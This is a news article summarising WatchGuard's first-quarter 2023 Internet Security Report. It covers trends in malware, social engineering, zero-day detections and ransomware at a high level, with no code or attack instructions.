International. In its most recent Internet Security Report, WatchGuard Technologies detailed the top malware trends and security threats across networks and endpoints during the first quarter of 2023.
In its pages, the report highlights fraudsters by leveraging browser-based social engineering strategies, new malware with ties to nation states, high amounts of zero-day malware, and an increase in attacks that exploit system resources, among others. Additionally, the report includes a new section dedicated to quarterly ransomware tracking and analysis by the Threat Lab team.
"Organizations need to pay more attention to existing security solutions and strategies to stay protected against increasingly sophisticated threats," says Corey Nachreiner, director of security at WatchGuard, who emphasizes the usefulness of layered malware defenses to combat attacks that leverage system resources: "It can be done simply and effectively with a unified security platform, managed by specialized managed service providers," he says.
Key findings from the first quarter Internet Security Report include:
New trends in browser-based social engineering
Now that web browsers have more protections against pop-up abuse, attackers have opted to use browser notifications to force similar interactions. A new threat related to SEO poisoning was also identified.
3 out of 4 threats have actors from China and Russia behind them
75% of the threats that debuted in the top 10 malware list have strong ties to nation states (this does not necessarily imply that these malicious actors are backed by states). Threat Lab analysts first identified the Zusy malware, which targets the Chinese population with adware that installs a compromised browser and then uses it to hijack Windows settings.
Persistent attacks against Office products
Document-based threats that target Office products remain on the most widespread malware list. A relatively high number of attacks against Microsoft's Internet Security and Acceleration (ISA) firewall were observed on the network. This is surprising because said product was discontinued and stopped receiving updates.
"Living-off-the-land" attacks on the rise
The ViperSoftX malware reviewed in DNS analysis is the latest example of the type of threat that leverages tools built into operating systems to meet its goals. The repeated presence of malware based on Microsoft Office and PowerShell in quarterly reports shows the importance of having endpoint protection that allows differentiating legitimate or malicious use from popular tools such as PowerShell.
Distribution malware targeting Linux systems
A new malware distributor targeting Linux-based systems has been detected. It's a shocking reminder that while Windows is king in the enterprise realm, it's unwise to ignore Linux and macOS. Therefore, it is recommended to include them when implementing Endpoint Detection and Response (EDR) to maintain complete coverage of the environment.
70% of detections are zero-day malware
Most of the detections were zero-day malware, acquired through unencrypted web traffic, while 93% were zero-day malware from encrypted web traffic. These threats can infect IoT devices, misconfigured servers, and equipment without strong host-based defenses such as Endpoint Defense and Response (EPDR).
New insights based on ransomware tracking data
Threat Lab recorded 852 victims posted on extortion sites and discovered 51 new ransomware variants. Ransomware groups continue to post victims at an alarming rate, including Fortune 500 companies.
